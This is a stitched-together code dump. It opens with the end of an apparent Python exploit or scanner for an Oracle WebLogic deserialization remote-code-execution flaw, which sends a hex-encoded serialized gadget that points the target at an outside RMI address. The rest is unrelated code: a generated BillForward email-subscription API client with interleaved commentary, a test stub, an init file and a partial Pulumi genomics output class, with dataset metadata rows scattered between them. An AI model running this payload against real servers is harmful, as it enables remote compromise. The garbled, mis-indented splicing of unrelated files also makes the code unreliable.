'000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e6
66f972245516452463e0200035b00087061636b6167657371',
'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
'{:04x}'.format(port)),
'1a7727000d3234322e323134',
'2e312e32353461863d1d0000000078'
]
for item in data:
con.send(bytes.fromhex(item))
time.sleep(2)
payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload = payload.__add__('ACED00057372004D636F6D2E6265612E636F72652E72657061636B616765642E737072696E676672616D65776F726B2E7472616E73616374696F6E2E6A74612E4A74615472616E73616374696F6E4D616E616765724EF3ECFBB628982F0200085A001A616C6C6F77437573746F6D49736F6C6174696F6E4C6576656C735A001C6175746F6465746563745472616E73616374696F6E4D616E616765725A00196175746F646574656374557365725472616E73616374696F6E5A00146361636865557365725472616E73616374696F6E5A001F757365725472616E73616374696F6E4F627461696E656446726F6D4A6E64694C00167472616E73616374696F6E4D616E616765724E616D657400124C6A6176612F6C616E672F537472696E673B4C00267472616E73616374696F6E53796E6368726F6E697A6174696F6E52656769737472794E616D6571007E00014C0013757365725472616E73616374696F6E4E616D6571007E00017872005E636F6D2E6265612E636F72652E72657061636B616765642E737072696E676672616D65776F726B2E7472616E73616374696F6E2E737570706F72742E4162737472616374506C6174666F726D5472616E73616374696F6E4D616E6167657235F8D3063ABC94C402000749000E64656661756C7454696D656F75745A001D6661696C4561726C794F6E476C6F62616C526F6C6C6261636B4F6E6C795A0024676C6F62616C526F6C6C6261636B4F6E50617274696369706174696F6E4661696C7572655A00186E65737465645472616E73616374696F6E416C6C6F7765645A0017726F6C6C6261636B4F6E436F6D6D69744661696C75726549001A7472616E73616374696F6E53796E6368726F6E697A6174696F6E5A001B76616C69646174654578697374696E675472616E73616374696F6E7870FFFFFFFF00010100000000000000010101007070740016726D693A2F2F382E382E382E383A38302F696E646578')
payload = payload.__add__('fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')
payload = bytes.fromhex(payload)
payload = struct.pack('>I', len(payload)) + payload[4:]
con.send(payload)
time.sleep(2)
res = ''
    try:
        read_content = con.recv(4096).decode('utf8', 'ignore')
        res += read_content
        while res != '' and read_content != '':
            time.sleep(0.1)
            read_content = con.recv(4096).decode('utf8', 'ignore')
            res += read_content
    except Exception:
        pass
    if 'weblogic.rjvm.ClassTableEntry' in res:
        print(f"[*] {ip}:{port} is vulnerable to the Oracle WebLogic Server WLS component remote code execution vulnerability, CVE number [{index}]")
    else:
        print(f"[ ] {ip}:{port} no [{index}] vulnerability detected")
# File: billforward/apis/emailsubscriptions_api.py (repo: billforward/bf-python, license: Apache-2.0)
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class EmailsubscriptionsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_email_subscription(self, request, **kwargs):
"""
Create an email subscription.
{\"nickname\":\"Create an email subscription\",\"request\":\"createEmailSubscriptionRequest.html\",\"response\":\"creatEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_email_subscription(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: . (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_email_subscription_with_http_info(request, **kwargs)
else:
(data) = self.create_email_subscription_with_http_info(request, **kwargs)
return data
def create_email_subscription_with_http_info(self, request, **kwargs):
"""
Create an email subscription.
{\"nickname\":\"Create an email subscription\",\"request\":\"createEmailSubscriptionRequest.html\",\"response\":\"creatEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_email_subscription_with_http_info(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: . (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['request']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_email_subscription" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `create_email_subscription`")
resource_path = '/email-subscriptions'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
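
Every generated method in this client validates its keyword arguments against the whitelist built from `all_params` before checking required parameters and dispatching. The core of that pattern, reduced to a standalone sketch — the function and parameter names here are illustrative, not part of the BillForward API:

```python
# Sketch of the swagger-codegen kwargs-validation pattern used above.
def send_request(required, **kwargs):
    # Whitelist of accepted keyword arguments, as the generated code builds it.
    all_params = ['required', 'callback', '_return_http_data_only']
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method send_request" % key
            )
    # Required-parameter check mirrors the generated `is None` guard.
    if required is None:
        raise ValueError("Missing the required parameter `required`")
    return {'required': required, **kwargs}

print(send_request('payload', callback=None))  # {'required': 'payload', 'callback': None}
```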
def delete_email_subscription_by_type(self, type, **kwargs):
"""
Unsubscribe from the email specified by the type parameter.
{ \"nickname\" : \"Unsubscribe\",\"response\" : \"unsubscribeEmail.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_email_subscription_by_type(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_email_subscription_by_type_with_http_info(type, **kwargs)
else:
(data) = self.delete_email_subscription_by_type_with_http_info(type, **kwargs)
return data
def delete_email_subscription_by_type_with_http_info(self, type, **kwargs):
"""
Unsubscribe from the email specified by the type parameter.
{ \"nickname\" : \"Unsubscribe\",\"response\" : \"unsubscribeEmail.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_email_subscription_by_type_with_http_info(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_email_subscription_by_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `delete_email_subscription_by_type`")
resource_path = '/email-subscriptions/type={type}'.replace('{format}', 'json')
path_params = {}
if 'type' in params:
path_params['type'] = params['type']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'text/xml'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_email_subscriptions(self, state, type, **kwargs):
"""
Returns a collection of all email-subscriptions. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get all email subscriptions\",\"response\":\"getEmailSubscriptionsAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_email_subscriptions(state, type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str state: Constrains search to Email Subscriptions of a specific state. (required)
:param str type: Constrains search to Email Subscriptions of a specific type (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first email-subscription to return.
:param int records: The maximum number of email-subscription to return.
:param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_email_subscriptions_with_http_info(state, type, **kwargs)
else:
(data) = self.get_all_email_subscriptions_with_http_info(state, type, **kwargs)
return data
def get_all_email_subscriptions_with_http_info(self, state, type, **kwargs):
"""
Returns a collection of all email-subscriptions. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get all email subscriptions\",\"response\":\"getEmailSubscriptionsAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_email_subscriptions_with_http_info(state, type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str state: Constrains search to Email Subscriptions of a specific state. (required)
:param str type: Constrains search to Email Subscriptions of a specific type. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first email-subscription to return.
:param int records: The maximum number of email-subscriptions to return.
:param str order_by: Specify a field used to order the result set.
:param str order: The direction of any ordering, either ASC or DESC.
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state', 'type', 'organizations', 'offset', 'records', 'order_by', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_email_subscriptions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'state' is set
if ('state' not in params) or (params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `get_all_email_subscriptions`")
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `get_all_email_subscriptions`")
resource_path = '/email-subscriptions'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
if 'state' in params:
query_params['state'] = params['state']
if 'type' in params:
query_params['type'] = params['type']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
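The chain of `if 'x' in params:` checks above just copies each optional parameter into the query dict when it was supplied. A compact stand-in (hypothetical helper; behaviour approximated, since the generated code tests key presence rather than `None`):

```python
def build_query_params(params, names):
    """Copy each named optional parameter into the query dict when it
    is present and not None, approximating the generated
    `if 'x' in params:` chain."""
    return {name: params[name]
            for name in names
            if params.get(name) is not None}

supplied = {'state': 'active', 'type': 'invoice',
            'offset': 0, 'records': None}
query = build_query_params(
    supplied,
    ['organizations', 'offset', 'records',
     'order_by', 'order', 'state', 'type'])
```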
def get_email_subscription_by_id(self, email_subscription_id, **kwargs):
"""
Retrieves a single email subscription, specified by ID.
{ \"nickname\" : \"Retrieve by ID\",\"response\" : \"getEmailSubscriptionByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_email_subscription_by_id(email_subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str email_subscription_id: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param bool include_retired: Include deleted email-subscriptions
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_email_subscription_by_id_with_http_info(email_subscription_id, **kwargs)
else:
(data) = self.get_email_subscription_by_id_with_http_info(email_subscription_id, **kwargs)
return data
def get_email_subscription_by_id_with_http_info(self, email_subscription_id, **kwargs):
"""
Retrieves a single email subscription, specified by ID.
{ \"nickname\" : \"Retrieve by ID\",\"response\" : \"getEmailSubscriptionByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_email_subscription_by_id_with_http_info(email_subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str email_subscription_id: (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param bool include_retired: Include deleted email-subscriptions
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['email_subscription_id', 'organizations', 'include_retired']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_subscription_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'email_subscription_id' is set
if ('email_subscription_id' not in params) or (params['email_subscription_id'] is None):
raise ValueError("Missing the required parameter `email_subscription_id` when calling `get_email_subscription_by_id`")
resource_path = '/email-subscriptions/{email-subscription-id}'.replace('{format}', 'json')
path_params = {}
if 'email_subscription_id' in params:
path_params['email-subscription-id'] = params['email_subscription_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'include_retired' in params:
query_params['include_retired'] = params['include_retired']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
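The `{email-subscription-id}` placeholder in the resource path is filled in from `path_params` by the api_client; a minimal sketch of that substitution (hypothetical helper):

```python
def expand_path(template, path_params):
    """Substitute each {placeholder} in the resource path with its
    value, as the api_client does with `path_params`."""
    for name, value in path_params.items():
        template = template.replace('{%s}' % name, str(value))
    return template

url = expand_path('/email-subscriptions/{email-subscription-id}',
                  {'email-subscription-id': 'ES-123'})
```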
def update_email_subscription(self, request, **kwargs):
"""
Update an email subscription.
{\"nickname\":\"Update EmailSubscription\",\"request\":\"updateEmailSubscriptionRequest.html\",\"response\":\"updateEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_email_subscription(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: The email-subscription update request. (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_email_subscription_with_http_info(request, **kwargs)
else:
(data) = self.update_email_subscription_with_http_info(request, **kwargs)
return data
def update_email_subscription_with_http_info(self, request, **kwargs):
"""
Update an email subscription.
{\"nickname\":\"Update EmailSubscription\",\"request\":\"updateEmailSubscriptionRequest.html\",\"response\":\"updateEmailSubscriptionResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_email_subscription_with_http_info(request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param BillingEntityBase request: The email-subscription update request. (required)
:return: EmailSubscriptionPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['request']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_email_subscription" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `update_email_subscription`")
resource_path = '/email-subscriptions'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailSubscriptionPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
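`select_header_accept` above collapses the acceptable media types into a single `Accept` header value, and the caller deletes the header when nothing is returned. A simplified stand-in, approximating the swagger-codegen helper:

```python
def select_header_accept(accepts):
    """Collapse a list of acceptable media types into a single
    `Accept` header value; returns None when the list is empty so
    the caller can drop the header entirely."""
    if not accepts:
        return None
    accepts = [a.lower() for a in accepts]
    if 'application/json' in accepts:
        return 'application/json'
    return ', '.join(accepts)

header = select_header_accept(
    ['text/xml', 'application/xml', 'application/json'])
```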
013dd20b1d479d48496b43799d2375a439935748 | 168 | py | Python | test/nvidia_dali_test.py | shuguang101/Deep-Speaker-Using-Domain-Adaptive | db459b8b42de3ac4f77bfea61792ffb9e03e47e4 | [
"MIT"
] | 1 | 2022-03-16T00:33:26.000Z | 2022-03-16T00:33:26.000Z | test/nvidia_dali_test.py | shuguang101/Deep-Speaker-Using-Domain-Adaptive | db459b8b42de3ac4f77bfea61792ffb9e03e47e4 | [
"MIT"
] | null | null | null | test/nvidia_dali_test.py | shuguang101/Deep-Speaker-Using-Domain-Adaptive | db459b8b42de3ac4f77bfea61792ffb9e03e47e4 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from nvidia.dali.pipeline import Pipeline
import nvidia.dali.ops as ops
import nvidia.dali.types as types
if __name__ == '__main__':
pass
6d733bd6c4d9228c4f07fa69df8b78e3d3625b06 | 199 | py | Python | seismicpro/models/__init__.py | pplotn/SeismicPro | a553c942c6f1f5e032611a66260718846259d643 | [
"Apache-2.0"
] | 1 | 2021-07-09T14:04:57.000Z | 2021-07-09T14:04:57.000Z | seismicpro/models/__init__.py | pplotn/SeismicPro | a553c942c6f1f5e032611a66260718846259d643 | [
"Apache-2.0"
] | null | null | null | seismicpro/models/__init__.py | pplotn/SeismicPro | a553c942c6f1f5e032611a66260718846259d643 | [
"Apache-2.0"
] | null | null | null | """Init file"""
from .hmm_model import * # pylint: disable=wildcard-import
from .unet_attention import * # pylint: disable=wildcard-import
from .metrics import * # pylint: disable=wildcard-import
6dbb8bee807cd6cb3289ed5a3e94fcc8cfc69464 | 24,504 | py | Python | sdk/python/pulumi_google_native/genomics/v1alpha2/outputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 44 | 2021-04-18T23:00:48.000Z | 2022-02-14T17:43:15.000Z | sdk/python/pulumi_google_native/genomics/v1alpha2/outputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 354 | 2021-04-16T16:48:39.000Z | 2022-03-31T17:16:39.000Z | sdk/python/pulumi_google_native/genomics/v1alpha2/outputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 8 | 2021-04-24T17:46:51.000Z | 2022-01-05T10:40:21.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = [
'DiskResponse',
'DockerExecutorResponse',
'LocalCopyResponse',
'PipelineParameterResponse',
'PipelineResourcesResponse',
]
@pulumi.output_type
class DiskResponse(dict):
"""
A Google Compute Engine disk resource specification.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "mountPoint":
suggest = "mount_point"
elif key == "readOnly":
suggest = "read_only"
elif key == "sizeGb":
suggest = "size_gb"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DiskResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DiskResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DiskResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
mount_point: str,
name: str,
read_only: bool,
size_gb: int,
source: str,
type: str):
"""
A Google Compute Engine disk resource specification.
:param str mount_point: Required at create time and cannot be overridden at run time. Specifies the path in the docker container where files on this disk should be located. For example, if `mountPoint` is `/mnt/disk`, and the parameter has `localPath` `inputs/file.txt`, the docker container can access the data at `/mnt/disk/inputs/file.txt`.
:param str name: The name of the disk that can be used in the pipeline parameters. Must be 1 - 63 characters. The name "boot" is reserved for system use.
:param bool read_only: Specifies how a sourced-base persistent disk will be mounted. See https://cloud.google.com/compute/docs/disks/persistent-disks#use_multi_instances for more details. Can only be set at create time.
:param int size_gb: The size of the disk. Defaults to 500 (GB). This field is not applicable for local SSD.
:param str source: The full or partial URL of the persistent disk to attach. See https://cloud.google.com/compute/docs/reference/latest/instances#resource and https://cloud.google.com/compute/docs/disks/persistent-disks#snapshots for more details.
:param str type: The type of the disk to create.
"""
pulumi.set(__self__, "mount_point", mount_point)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "read_only", read_only)
pulumi.set(__self__, "size_gb", size_gb)
pulumi.set(__self__, "source", source)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="mountPoint")
def mount_point(self) -> str:
"""
Required at create time and cannot be overridden at run time. Specifies the path in the docker container where files on this disk should be located. For example, if `mountPoint` is `/mnt/disk`, and the parameter has `localPath` `inputs/file.txt`, the docker container can access the data at `/mnt/disk/inputs/file.txt`.
"""
return pulumi.get(self, "mount_point")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the disk that can be used in the pipeline parameters. Must be 1 - 63 characters. The name "boot" is reserved for system use.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="readOnly")
def read_only(self) -> bool:
"""
Specifies how a sourced-base persistent disk will be mounted. See https://cloud.google.com/compute/docs/disks/persistent-disks#use_multi_instances for more details. Can only be set at create time.
"""
return pulumi.get(self, "read_only")
@property
@pulumi.getter(name="sizeGb")
def size_gb(self) -> int:
"""
The size of the disk. Defaults to 500 (GB). This field is not applicable for local SSD.
"""
return pulumi.get(self, "size_gb")
@property
@pulumi.getter
def source(self) -> str:
"""
The full or partial URL of the persistent disk to attach. See https://cloud.google.com/compute/docs/reference/latest/instances#resource and https://cloud.google.com/compute/docs/disks/persistent-disks#snapshots for more details.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the disk to create.
"""
